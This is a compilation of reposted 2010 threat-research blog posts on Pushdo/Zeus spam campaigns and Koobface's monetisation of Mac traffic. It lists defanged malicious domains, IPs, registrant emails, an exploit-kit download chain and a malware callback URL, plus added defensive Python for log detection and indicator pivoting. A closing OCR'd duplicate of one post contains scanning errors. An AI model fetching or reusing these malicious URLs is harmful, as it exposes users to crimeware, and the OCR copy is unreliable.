ns1.fredoms .com
ns1.ajstaffing .net
ns1.angel-death .net
ns1.aj-estate .com
ns1.aj-realtors .com
ns1.pdsproperties .com
ns1.groupswat .com
Upon execution, [8]settings-file.exe (Trojan-Spy.Win32.Zbot.adsy) phones back to 109.123.70 .97/fh3245sq/config.bin.

Detection rate for pdf.pdf ([9]Exploit-PDF.ac) and file.exe ([10]Trojan.Win32.Riern).

The structure of the iFrame is as follows:

- atthisstage .com/uksp/in.php - 84.45.45.135 - Email: soakes@soakes.com
- atthisstage .com/uksp/jquery.jxx
- atthisstage .com/uksp/xd/pdf.pdf
- atthisstage .com/uksp/load.php
- atthisstage .com/uksp/file.exe
Russian Brides spamvertised domains part of an affiliate network:

toolbarsunited .com - Email: soft.tj@gmail.com
2006jubilee .com - Email: soft.tj@gmail.com
avtofo .org - Email: flarnes@gmail.com
lovesexdatings .com - Email: kauplus@li.ru
stars-dating .com - Email: kauplus@li.ru
avtofo.com .ua
dinenyc .net
cid-f5f40ef1f5210d08.spaces .live.com
cid-c1b015ffe1b44573.spaces .live.com
cid-b78f4f23e27d2b45.spaces .live.com
cid-8d3413073f537740.spaces .live.com
cid-205046cf66900102.spaces .live.com

If you want to know more about the inner workings of the Pushdo/Cutwail botnet, consider going through the [11]Pushdo / Cutwail - An In-depth Analysis report.

Related posts:

[12] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[13] Pushdo Injecting Bogus Swine Flu Vaccine

[14] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware

[15] Ongoing FDIC Spam Campaign Serves Zeus Crimeware

[16] The Multitasking Fast-Flux Botnet that Wants to Bank With You

This post has been reproduced from [17]Dancho Danchev's blog.



1. http://www.virustotal.com/analisis/bebf6c8b3c6a29acfb7d51022c0948da1ec2e83d3c8aa4b4c1d27cca901fd631-1263573013

2. http://www.virustotal.com/analisis/1933c6e274093be895c8d904b9a32a8f008cebc3a608622a2afd09e2ba68fa7c-1263573021

3. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

4. http://garwarner.blogspot.com/2010/01/this-week-in-avalanche-zbot-zeus-bot.html

5. https://twitter.com/avivra/status/7720494889

6. https://twitter.com/avivra/status/7721711447

7. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

8. http://www.virustotal.com/analisis/d62d93ffa6f091db355e56b6db6bce9cdf683e34256d734b7c9ec6321ad917e8-1263398244

9. http://www.virustotal.com/analisis/8f15b24627621b74df7af103fe2fef9908728a3c0bd1a2afdf83947e980251cc-1263396897

10. http://www.virustotal.com/analisis/433accd7f258c1813c6c6310a4a2347ee45530db839bea2663f59f2ccf6d3be3-1263397127

11. http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/study_of_pushdo.pdf

12. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

13. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

14. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

15. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

16. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

17. http://ddanchev.blogspot.com/
Follow Me on Twitter! (2010-01-18 19:05)

Are you on Twitter? If so, [1]consider following my tweets, or if you're not using it you can always [2]subscribe to the RSS feed.

1. http://twitter.com/danchodanchev

2. http://twitter.com/statuses/user_timeline/19680610.rss
Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits (2010-01-26 09:34)

Continuing [1]the Pushdo coverage from last week, the "Your AOL Instant Messenger account is flagged as inactive" [2]or "the latest update for the AIM" themed campaign from the weekend has once again returned to a well known theme, namely, the "[3]Facebook Update Tool" spam campaign.

The botnet masters have introduced several new name servers - domain suspension is pending - but continue using the same IP embedded on all the pages for serving the client-side exploits, with a slight change in the directory structure.

- Sample subject: Facebook Update Tool

- Sample body: "Dear Facebook user, In an effort to make your online experience safer and more enjoyable, Facebook will be implementing a new login system that will affect all Facebook users. These changes will offer new features and increased account security. Before you are able to use the new login system, you will be required to update your account. Click here to update your account online now. If you have any questions, reference our New User Guide. Thanks, The Facebook Team"

- Sample URL: facebook.com.ddeassrq .vc/usr/Login Facebook.php?ref

- Detection rates for scripts/crimeware/exploits: [4]File.exe (phones back to the currently down nekovo .ru/cbd/nekovo.bri); [5]IE.js; [6]IE2.js; [7]nowTrue.swf; [8]pdf.pdf

- Sample iFrame exploitation structure:
- 109.95.114 .251/us01d/in.php
- 109.95.114 .251/us01d/jquery.jxx
- 109.95.114 .251/us01d/xd/pdf.pdf
- 109.95.114 .251/us01d/load.php
- 109.95.114 .251/us01d/file.exe
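The iFrame structure above is the same five-step chain (in.php, jquery.jxx, xd/pdf.pdf, load.php, file.exe) seen under atthisstage .com/uksp/ in the OWA-themed campaign, only the directory name changed. As an added example, not code from the original post or from any party it describes, the following Python routine looks for that chain in proxy logs: a client that fetches three or more of the components from the same host and directory is flagged, and a 200 on file.exe is reported separately because that is the request that actually delivers the crimeware. The log lines are constructed sample input in an assumed squid-like format (epoch, client, method, URL, status); the only real values in them are the hosts and directory names quoted in the two posts. The three-step threshold is an assumption too.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The five components the spammed pages load through the iFrame, in load
# order, as listed in this post (us01d/) and in the OWA-themed one (uksp/).
CHAIN = ("in.php", "jquery.jxx", "xd/pdf.pdf", "load.php", "file.exe")
PAYLOAD_STEP = CHAIN.index("file.exe")

# Constructed sample proxy log (assumed format: epoch client method url status).
# Not real traffic; hosts and directories are the ones quoted in the posts.
SAMPLE_LOG = """\
1264492801 10.0.0.12 GET http://atthisstage.com/uksp/in.php 200
1264492802 10.0.0.12 GET http://atthisstage.com/uksp/jquery.jxx 200
1264492803 10.0.0.12 GET http://atthisstage.com/uksp/xd/pdf.pdf 200
1264492805 10.0.0.12 GET http://atthisstage.com/uksp/load.php 200
1264492806 10.0.0.12 GET http://atthisstage.com/uksp/file.exe 200
1264492810 10.0.0.34 GET http://example.com/index.html 200
1264492811 10.0.0.34 GET http://109.95.114.251/us01d/in.php 200
1264492812 10.0.0.34 GET http://109.95.114.251/us01d/jquery.jxx 404
this line is garbage and must be skipped
"""

LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")


def parse_log(text):
    """Yield (epoch, client, url, status) for every well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, client, _method, url, status = m.groups()
            yield int(ts), client, url, int(status)


def chain_step(url):
    """If the URL path ends in one chain component, return (host, kit_dir, step)."""
    parts = urlsplit(url)
    for step, tail in enumerate(CHAIN):
        if parts.path.endswith("/" + tail):
            kit_dir = parts.path[: -len(tail)]  # e.g. "/uksp/" or "/us01d/"
            return parts.hostname, kit_dir, step
    return None


def find_exploit_chains(text, min_steps=3):
    """Return {(client, host, kit_dir): {"steps": [...], "payload_fetched": bool}}
    for every client that requested at least min_steps distinct chain components
    from the same host and directory. payload_fetched is True only when file.exe
    came back with HTTP 200, i.e. the crimeware reached the client."""
    seen = defaultdict(lambda: {"steps": set(), "payload_fetched": False})
    for _ts, client, url, status in parse_log(text):
        hit = chain_step(url)
        if hit is None:
            continue
        host, kit_dir, step = hit
        rec = seen[(client, host, kit_dir)]
        rec["steps"].add(step)
        if step == PAYLOAD_STEP and status == 200:
            rec["payload_fetched"] = True
    return {
        key: {"steps": sorted(rec["steps"]), "payload_fetched": rec["payload_fetched"]}
        for key, rec in seen.items()
        if len(rec["steps"]) >= min_steps
    }


if __name__ == "__main__":
    for (client, host, kit_dir), rec in find_exploit_chains(SAMPLE_LOG).items():
        print(f"{client} walked {len(rec['steps'])}/{len(CHAIN)} steps of "
              f"{host}{kit_dir} payload_fetched={rec['payload_fetched']}")
```

Matching on the ordered set of path tails rather than on the host is deliberate: the gang rotated the IP and the directory between the two campaigns but kept the file names, so a host-based blocklist lags by one campaign while the chain signature does not. On the constructed sample, only 10.0.0.12 is reported; 10.0.0.34 hit two components of the us01d/ chain (the second with a 404) and stays below the threshold, which is the kind of partial hit a triage analyst would still want to see by lowering min_steps.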

- Sample typosquatted and currently active domains:

ddeasaeq .vc - Email: mspspaceki@mad.scientist.com
ddeasuqq .vc - Email: mspspaceki@mad.scientist.com
ddeassrq .vc - Email: mspspaceki@mad.scientist.com
ddeasutq .vc - Email: mspspaceki@mad.scientist.com
ddeasauq .vc - Email: mspspaceki@mad.scientist.com
ddeasqwq .vc - Email: mspspaceki@mad.scientist.com
ddeasqyq .vc - Email: mspspaceki@mad.scientist.com
reeesassf .la - Email: palatalizefxt@popstar.com
ukgedsa.com .hn - Email: zmamarc689@witty.com
ukgedsc.com .vc - Email: zmamarc689@witty.com
ukgedse.com .hn - Email: zmamarc689@witty.com
ukgedsg.com .vc - Email: zmamarc689@witty.com
ukgedsh.com .vc - Email: zmamarc689@witty.com
ukgedsi .hn - Email: zmamarc689@witty.com
ukgedsq.com .hn - Email: zmamarc689@witty.com
ukgedsr.com .sc - Email: zmamarc689@witty.com
ukgedst.com .sc - Email: zmamarc689@witty.com
ukgedsu.com .vc - Email: zmamarc689@witty.com
ukgedsv.com .vc - Email: zmamarc689@witty.com
ukgedsy.com .vc - Email: zmamarc689@witty.com

- Name servers of notice:

ns1.availname .net - 204.12.229.89 - Email: Larimore@yahoo.com
ns1.sorbauto .com - 204.12.229.89 - Email: xtrai@email.com
ns1.worldkinofest .com - Email: tolosa1965@snail-mail.net
ns1.pdsproperties .net - 92.84.23.138 - Email: PDSProperties@yahoo.com
ns1.drinckclub .com - 94.23.177.147 - Email: excins@iname.com
ns1.transsubmit .net - 94.23.177.147 - Email: Alaniz@gmail.com
ns1.theautocompany .net - suspended
ns1.24stophours .com - suspended
ns1.disksilver .net - suspended

Thankfully, quality assurance is not taken into consideration in this campaign - the iFrame's IP is already heavily blacklisted, and the crimeware sample itself attempts to phone back to a C&C that has been down for several days.

The gang's activities will be updated as they happen. 

Related posts:

[9] Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams

[10] Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware

[11] Pushdo Injecting Bogus Swine Flu Vaccine

[12] "Your mailbox has been deactivated" Spam Campaign Serving Crimeware

[13] Ongoing FDIC Spam Campaign Serves Zeus Crimeware

[14] The Multitasking Fast-Flux Botnet that Wants to Bank With You

This post has been reproduced from [15]Dancho Danchev's blog.

1. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

2. http://garwarner.blogspot.com/2010/01/aol-update-spreads-zeus-zbot.html

3. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

4. http://www.virustotal.com/analisis/c362c51b41df7ff9c6a0f633a4fbd22cd399c91221d0ed66c9fca1879d3ba8ba-1264464538

5. http://www.virustotal.com/analisis/78f852ec4b2ad250c1096d5daf2ec05ff1ab79f75c2225cdd71df0901ef6b8dd-1264464978

6. http://www.virustotal.com/analisis/60f61537c725d257a2edb86f65f5f4ab3c9871c7e9c460cb1ccb7466f1f14496-1264464983

7. http://www.virustotal.com/analisis/de54327ae5b208f1f45704d41ef03c02758f7f12c2f63907db70429629c44df3-1264464990

8. http://www.virustotal.com/analisis/63eb7672e92b590a94c08ef59fb8aaea069dfdd7242c78b2670d9634d65a0e9f-1264465015

9. http://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.html

10. http://ddanchev.blogspot.com/2010/01/outlook-web-access-themed-spam-campaign.html

11. http://ddanchev.blogspot.com/2009/12/pushdo-injecting-bogus-swine-flu.html

12. http://ddanchev.blogspot.com/2009/11/your-mailbox-has-been-deactivated-spam.html

13. http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html

14. http://ddanchev.blogspot.com/2009/07/multitasking-fast-flux-botnet-that.html

15. http://ddanchev.blogspot.com/
Inside a Commercial Chinese DIY DDoS Platform (2010-01-26 14:28)

With China in the focus of international fiasco (consider going through the [1]Google-China cyber espionage saga - FAQ)

Related Chinese hacking/hacktivism coverage:

[2] Localizing Open Source Malware

[3] Custom DDoS Capabilities Within a Malware

[4] Custom DDoS Attacks Within Popular Malware Diversifying

[5] The FirePack Exploitation Kit Localized to Chinese

[6] MPack and IcePack Localized to Chinese

[7] Massive SQL Injection Attacks - the Chinese Way

[8] A Chinese DIY Multi-Feature Malware

[9] DIY Chinese Passwords Stealer

[10] A Chinese Malware Downloader in the Wild

[11] Chinese Hackers Attacking U.S Department of Defense Networks

[12] Chinese Hacktivists Waging People's Information Warfare Against CNN

[13] The DDoS Attack Against CNN.com

This post has been reproduced from [14]Dancho Danchev's blog. Follow him [15]on Twitter.

1. http://blogs.zdnet.com/security/?p=5259

2. http://ddanchev.blogspot.com/2007/09/localizing-open-source-malware.html

3. http://ddanchev.blogspot.com/2007/09/custom-ddos-capabilities-within-malware.html

4. http://ddanchev.blogspot.com/2008/05/custom-ddos-attacks-within-popular.html

5. http://ddanchev.blogspot.com/2008/05/firepack-exploitation-kit-localized-to.html

6. http://ddanchev.blogspot.com/2007/10/mpack-and-icepack-localized-to-chinese.html

7. http://ddanchev.blogspot.com/2008/10/massive-sql-injection-attacks-chinese.html

8. http://ddanchev.blogspot.com/2008/05/chinese-diy-multi-feature-malware.html

9. http://ddanchev.blogspot.com/2007/09/diy-chinese-passwords-stealer.html

10. http://ddanchev.blogspot.com/2007/09/chinese-malware-downloader-in-wild.html

11. http://ddanchev.blogspot.com/2006/09/chinese-hackers-attacking-us.html

12. http://ddanchev.blogspot.com/2008/04/chinese-hacktivists-waging-peoples.html

13. http://ddanchev.blogspot.com/2008/04/ddos-attack-against-cnncom.html

14. http://ddanchev.blogspot.com/

15. http://twitter.com/danchodanchev
February

Summarizing Zero Day's Posts for January (2010-02-01 22:34)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for January, 2010. You can also go through [2]previous summaries, as well as subscribe to my [3]personal RSS feed, [4]Zero Day's main feed, [5]follow me or all of [6]ZDNet's blogs on Twitter.

Recommended reading - [7]Google-China cyber espionage saga - FAQ.

01. [8]Baidu DNS records hijacked by Iranian Cyber Army

02. [9]Haiti earthquake themed blackhat SEO campaigns serving scareware

03. [10]Google-China cyber espionage saga - FAQ

04. [11]And the most popular password is...

05. [12]Bogus IQ test with destructive payload in the wild

06. [13]Report: 48% of 22 million scanned computers infected with malware

This post has been reproduced from [14]Dancho Danchev's blog. Follow him [15]on Twitter.

1. http://blogs.zdnet.com/security

2. http://ddanchev.blogspot.com/2010/01/summarizing-zero-days-posts-for.html

3. http://updates.zdnet.com/tags/dancho+danchev.html?t=0&s=0&o=1&mode=rss

4. http://feeds.feedburner.com/zdnet/security

5. http://twitter.com/danchodanchev

6. http://twitter.com/zdnetblogs

7. http://blogs.zdnet.com/security/?p=5259

8. http://blogs.zdnet.com/security/?p=5204

9. http://blogs.zdnet.com/security/?p=5244

10. http://blogs.zdnet.com/security/?p=5259

11. http://blogs.zdnet.com/security/?p=5325

12. http://blogs.zdnet.com/security/?p=5357

13. http://blogs.zdnet.com/security/?p=5365

14. http://ddanchev.blogspot.com/

15. http://twitter.com/danchodanchev
How the Koobface Gang Monetizes Mac OS X Traffic (2010-02-02 18:07)

Mac users appear to have a special place in the heart of the Koobface gang, since they've recently started experimenting with a monetization strategy especially for them - by compromising legitimate sites for the sole purpose of embedding them with the popular PHP backdoor shell C99 (Synsta mod), in an attempt to redirect all the Mac OS X traffic to affiliate dating programs, such as for instance [1]AdultFriendFinder.

The use of Synsta's C99 mod is not a novel approach; the gang has been using it for over a year and a half now. The original KROTEG injected script now includes a "hey rogazi" message. "Hey rogazi" appears to be some kind of slang word (rogatstsi) for scooter-driving Italian people. What's also interesting to point out is that the Mac OS X redirection takes place through one of the few currently active centralized IPs from Koobface 1.0's infrastructure - 61.235.117.83.

This very same IP (profiled in [2]August, 2009 and then in [3]September, 2009) was once brought offline thanks to the folks at China CERT, but quickly resumed operation, with Koobface 1.0's "leftovers" xtsd20090815 .com and kiano-180809 .com (the domain was [4]serving client-side exploits in the Koobface gang's November 2009 experiment, followed by another one again hosted at 61.235.117.83) still parked there.

• Go through related web shell backdoors, monetization posts: [5]A Compilation of Web Backdoors; [6]Monetizing Web Site Defacements; [7]Underground Multitasking in Action; [8]Monetizing Compromised Web Sites, [9]Web Site Defacement Groups Going Phishing
Moreover, this China-based IP (it even has a modest [10]Alexa pagerank) was also the centralized redirection point in Koobface 1.0's scareware business model, using popup.php to redirect to a systematically updated portfolio of scareware domains, and the first time ever that I came across what [11]the gang is now publicly acknowledging as the "2008 ali baba and 40, LLC" team.


[12] AS9394 (CRNET) itself is currently hosting the following 
active Zeus crimeware campaigns: 

[13] 6alava .com - 61.235.117.70 - Email: 
necks@corporatemail.ru 

[14] sicha-linna .com - 61.235.117.77 - Email: 
stay@bigmailbox.ru 

[15] stopspaming .com - 61.235.117.70 - Email: 
bunco@e2mail.ru 

[16] ubojnajasila .net - 61.235.117.87 - Email: 
ubojnajasila.net@contactprivacy.com 

Here's how the experiment looks in its current form. Once the OS is detected, the redirection takes place through 61.235.117.83 /mac.php -> 61.235.117.83 /vvv.htm, loading the following pages using the gang's unique campaign IDs at AdultFriendFinder:

- BestDatingDirect .com/page_hot.php?page=random&did=14029

- adultfriendfinder .com/go/page/adffadult_gonzo?pid=p291351.sub2w954&lang=english

- adultfriendfinder .com/go/page/landing_page_geobanner?pid=g227362-ppc
Parked on 63.218.226.67 - AS3491; PCCWGlobal-ASN PCCW Global are the rest of the dating site redirectors:

bestdatingdirect .com
bestnetdate .com
currentdating .com
datefunclub .com
enormousdating .com
giantdating .com
onlinelovedating .com
worldbestdate .com
worlddatinghere .com

This isn't the first time that the Koobface gang is attempting to monetize traffic through dating affiliate networks. In fact, in November's "[17]Koobface Botnet's Scareware Business Model - Part Two" post, emphasizing the gang's connection with blackhat SEO campaigns, the Bahama botnet and the [18]malvertising attacks at the web site of the New York Times, I also [19]pointed out their connection with an [20]Ukrainian dating scam agency profiled before, whose botnet was also linked to [21]money mule recruitment campaigns in May, 2009.

[22]An excerpt is worth a thousand words:

The historical OSINT paragraph mentioned that several of the scareware domains pushed during the past two weeks were responding to 62.90.136.237. This very same 62.90.136.207 IP was hosting domains part of an [23]Ukrainian dating scam agency known as [24]Confidential Connections earlier this year, whose spamming operations were linked to a [25]botnet involved in money mule recruitment activities.

For the time being, the following dating scam domains are responding to the same IP:

healthe-lovesite .com - Email: potenciallio@safe-mail.net
love-isaclick .com - Email: potenciallio@safe-mail.net
love-is-special .com - Email: potenciallio@safe-mail.net
only-loveall .com - Email: potenciallio@safe-mail.net
and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net
andiloveyoutoo .com - Email: menorstlO@yahoo.com
romantic-love-forever .com - Email: potenciallio@safe-mail.net
love-youloves .com - Email: potenciallio@safe-mail.net
love-galaxys .com - Email: potenciallio@safe-mail.net
love-formeandyou .com - Email: potenciallio@safe-mail.net
ifound-thelove .net - Email: potenciallio@safe-mail.net
findloveon .net - Email: wersers@yahoo.com
love-isexcellent .net - Email: potenciallio@safe-mail.net

Could it get even more malicious and fraudulent than that? Appreciate my rhetoric.

The same email (potenciallio@safe-mail.net) that was used to register the dating scam domains was also [26]used to register exploit serving domains at 195.88.190.247, [27]participate in phishing campaigns, and register a [28]money mule recruitment site for the non-existent [29]Allied Insurance LLC. (Allied Group, Inc.).
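The pivots this post keeps applying (one registrant address, potenciallio@safe-mail.net, tying dating, exploit-serving and money mule domains together; two of the Zeus domains on AS9394 sharing 61.235.117.70) can be mechanised. Below is an added Python example, not the blog's code and not any project's library, that parses indicator lines written in the post's own defanged "domain - IP - Email:" notation, refangs them, and expands from one confirmed-bad domain to everything sharing its registrant email or hosting IP, which is how a defender grows a blocklist from a single seed. The indicator text is a constructed subset of the values listed above; the line format, the one-hop rule and the function names are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the post's own notation (a space before the TLD defangs
# the domain); the values are a subset copied from the lists above.
SAMPLE_INDICATORS = """\
6alava .com - 61.235.117.70 - Email: necks@corporatemail.ru
sicha-linna .com - 61.235.117.77 - Email: stay@bigmailbox.ru
stopspaming .com - 61.235.117.70 - Email: bunco@e2mail.ru
healthe-lovesite .com - Email: potenciallio@safe-mail.net
love-isaclick .com - Email: potenciallio@safe-mail.net
findloveon .net - Email: wersers@yahoo.com
avtofo.com .ua
"""

INDICATOR_RE = re.compile(
    r"^(?P<domain>\S+(?: \.\S+)+)"                  # labels, then " .tld"
    r"(?: - (?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"      # optional hosting IP
    r"(?: - Email: (?P<email>[^\s@]+@[^\s@]+))?$"   # optional registrant email
)


def refang(defanged):
    """Turn the post's 'name .tld' form back into a real hostname."""
    return defanged.replace(" .", ".").lower()


def parse_indicators(text):
    """Return a list of {"domain", "ip", "email"} dicts; ip/email are None when absent."""
    records = []
    for line in text.splitlines():
        m = INDICATOR_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not an indicator line
        records.append({
            "domain": refang(m.group("domain")),
            "ip": m.group("ip"),
            "email": (m.group("email") or "").lower() or None,
        })
    return records


def pivot(records, field):
    """Group domains by a shared attribute ("ip" or "email"), ignoring unknowns."""
    groups = defaultdict(list)
    for rec in records:
        if rec[field]:
            groups[rec[field]].append(rec["domain"])
    return {k: sorted(v) for k, v in groups.items()}


def expand_from_seed(records, seed_domain, fields=("email", "ip")):
    """Starting from one confirmed-bad domain, return every other domain that
    shares its registrant email or hosting IP. One hop only, on purpose: a
    shared throwaway address is strong evidence, a shared hosting IP can be
    noise on a busy server, so a human looks before the next hop is taken."""
    seed = next((r for r in records if r["domain"] == seed_domain), None)
    if seed is None:
        raise KeyError(f"{seed_domain} not in indicator set")
    related = set()
    for field in fields:
        if seed[field]:
            related.update(pivot(records, field).get(seed[field], []))
    related.discard(seed_domain)
    return related


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE_INDICATORS)
    for email, domains in pivot(recs, "email").items():
        if len(domains) > 1:
            print(f"{email}: {', '.join(domains)}")
    print("related to 6alava.com:", sorted(expand_from_seed(recs, "6alava.com")))
```

Run on the sample, the email pivot reproduces the post's observation that the potenciallio address links the dating domains, and the IP pivot links 6alava .com to stopspaming .com through 61.235.117.70 while leaving sicha-linna .com (a different IP on the same AS) out, which is the distinction between "same operator" and "same hosting provider" that an analyst has to keep making.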

Of course, the money made in the process looks like pocket change compared to the money the gang makes through blackhat SEO, click fraud and scareware in general - go through the related posts at the bottom of the article. But since they've previously indicated what I originally anticipated they'd do sooner or later, namely, start diversifying and experimenting due to the ever-growing compromised infrastructure, what they'll do next on the Mac front is an issue worth keeping an eye on.

Related Koobface gang/botnet research:

[30] The Koobface Gang Wishes the Industry "Happy Holidays"

[31] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline

[32] Koobface Botnet Starts Serving Client-Side Exploits

[33] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style

[34] Koobface Botnet's Scareware Business Model - Part Two

[35] Koobface Botnet's Scareware Business Model - Part One

[36] Koobface Botnet Redirects Facebook's IP Space to my Blog

[37] New Koobface campaign spoofs Adobe's Flash updater

[38] Social engineering tactics of the Koobface botnet

[39] Koobface Botnet Dissected in a TrendMicro Report

[40] Movement on the Koobface Front - Part Two

[41] Movement on the Koobface Front

[42] Koobface - Come Out, Come Out, Wherever You Are

[43] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [44]Dancho Danchev's blog. Follow him [45]on Twitter.

1. https://secure.adultfriendfinder.com/p/partners/main.cgi

2. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

3. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

4. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html

5. http://ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html

6. http://ddanchev.blogspot.com/2008/06/monetizing-web-site-defacements.html

7. http://ddanchev.blogspot.com/2008/06/underground-multitasking-in-action.html

8. http://ddanchev.blogspot.com/2008/07/monetizing-compromised-web-sites.html

9. http://ddanchev.blogspot.com/2008/04/web-site-defacement-groups-going.html

10. http://www.alexa.com/siteinfo/http://61.235.117.83#rank

11. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html

12. http://www.google.com/safebrowsing/diagnostic?site=AS:9394

13. https://zeustracker.abuse.ch/monitor.php?host=6alava.com

14. https://zeustracker.abuse.ch/monitor.php?host=sicha-linna.com

15. https://zeustracker.abuse.ch/monitor.php?host=stopspaming.com

16. https://zeustracker.abuse.ch/monitor.php?host=ubojnajasila.net

17. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

18. http://ddanchev.blogspot.com/2009/09/ukrainian-fan-club-features.html

19. http://ddanchev.blogspot.com/2009/05/dating-spam-campaign-promotes-bogus.html

20. http://ddanchev.blogspot.com/2009/06/dating-spam-campaign-promotes-bogus.html

21. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

22. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

23. http://ddanchev.blogspot.com/2009/05/dating-spam-campaign-promotes-bogus.html

24. http://ddanchev.blogspot.com/2009/06/dating-spam-campaign-promotes-bogus.html

25. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

26. http://www.malwaredomainlist.com/forums/index.php?topic=3442.0

27. http://garwarner.blogspot.com/2009/10/microsoft-your-e-mail-will-be-blocked.html

28. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

29. http://www.bobbear.co.uk/allied-insurance-llc.html

30. http://ddanchev.blogspot.com/2009/12/koobface-gang-wishes-industry-happy.html

31. http://ddanchev.blogspot.com/2009/12/koobface-friendly-riccom-ltd-as29550.html

32. http://ddanchev.blogspot.com/2009/11/koobface-botnet-starts-serving-client.html

33. http://ddanchev.blogspot.com/2009/11/massive-scareware-serving-blackhat-seo.html

34. http://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

35. http://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

36. http://ddanchev.blogspot.com/2009/10/koobface-botnet-redirects-facebooks-ip.html

37. http://blogs.zdnet.com/security/?p=4594

38. http://content.zdnet.com/2346-12691_22-352597.html

39. http://ddanchev.blogspot.com/2009/10/koobface-botnet-dissected-in-trendmicro.html

40. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

41. http://ddanchev.blogspot.com/2009/08/movement-on-koobface-front.html

42. http://ddanchev.blogspot.com/2009/07/koobface-come-out-come-out-wherever-you.html

43. http://ddanchev.blogspot.com/2009/07/dissecting-koobface-worms-twitter.html

44. http://ddanchev.blogspot.com/

45. http://twitter.com/danchodanchev
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How the Koobface Gang Monetizes Mac OS X Traffic 
(2010-02-02 18:07) 

Mac users appear to have a special place in the heart of the 
Koobface gang, since they've recently started experimenting 
with a monetization strategy especially for them - by 
compromising legitimate sites for the sole purpose of 
embedding them with the popular PHP backdoor shell C99 
(Synsta mod), in an attempt to redirect all the Mac OS X 

traffic to affiliate dating programs, such as for instance 
[l]AdultFriendFinder. 

The use of Synsta's C99 mod is not a novel approach, the 
gang has been using for over an year and a half now. The 
original KROTEG injected script, is now including a 11 hey 
rogazi" message. "Fley rogazi" appears to be some kind of 
slang 53 
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word ( rogatstsi) for scooter driving Italian people. What's 
also interesting to point out is that the Mac OS X redirection 
takes place through one of the few currently active 
centralized IPs from Koobface 1.0's infrastructure - 

61.235.117.83. 
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This very same IP (profiled in [2]August, 2009 and then in 
[3]September, 2009) was once brought offline thanks to the 
folks at China CERT, but quickly resumed operation, with 
Koobface 1.0's "leftovers" xtsd20090815 .com and kiano- 
180809 .com (domain was [4]serving client-side exploits in 
November 2009's experiment by the Koobfae gang, followed 
by another one again hosted at 61.235.117.83) still parked 
there. 

• Go through related web shell backdoors, monetization 
posts: [5]A Compilation of Web Backdoors; [6]Mone- 

tizing Web Site Defacements; [7]Underground Multitasking 
in Action; [8]Monetizing Compromised Web Sites, 

[9]Web Site Defacement Groups Going Phishing 
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Moreover, this China-based IP (it even has a modest 
[10]Alexa pagerank) was also the centralized redirection 
point in Koobface 1.0's scareware business model using 
popup.php to redirect to a systematically updated portfolio 
of scareware domains, and the first time ever that I came 
across to what [ 11 ]the gang is now publicly acknowledging 
as the " 2008 ali baba and 40, LLC" team. 

[12] AS9394 (CRNET) itself is currently hosting the following 
active Zeus crimeware campaigns: 

[13] 6alava .com - 61.235.117.70 - Email: 
necks@corporatemail.ru 


[14] sicha-linna .com - 61.235.117.77 - Email: 
stay@bigmailbox.ru 

[15] stopspaming .com - 61.235.117.70 - Email: 
bunco@e2mail.ru 

[16] ubojnajasila .net - 61.235.117.87 - Email: 
ubojnajasila.net@contactprivacy.com 

Here's how the experiment looks like in its current form. Once 
the OS is detected, the redirection takes place 

through 61.235.117.83 /mac.php -> 61.235.117.83 
/vvv.htm loading the following pages, using the gang's 
unique campaign IDs at AdultFriendFinder: 

- BestDatingDirect .com/page hot.php?page = random 
&did=14029 

- adultfriendfinder .com/go/page/ad ffadult gonzo? 
pid=p291351.sub2w954 &lang=english 

- adultfriendfinder .com/go/page/landing page 
_geobanner?pid=g227362-ppc 

56 




Parked on 63.218.226.67 - AS3491; PCCWGIobal-ASN 
PCCW Global is the rest of the dating site redirectors: 

bestdatingdirect .com 

bestnetdate .com 

currentdating .com 


datefunclub .com 


enormousdating .com 
giantdating .com 
onlinelovedating .com 
woridbestdate .com 
worlddatinghere .com 

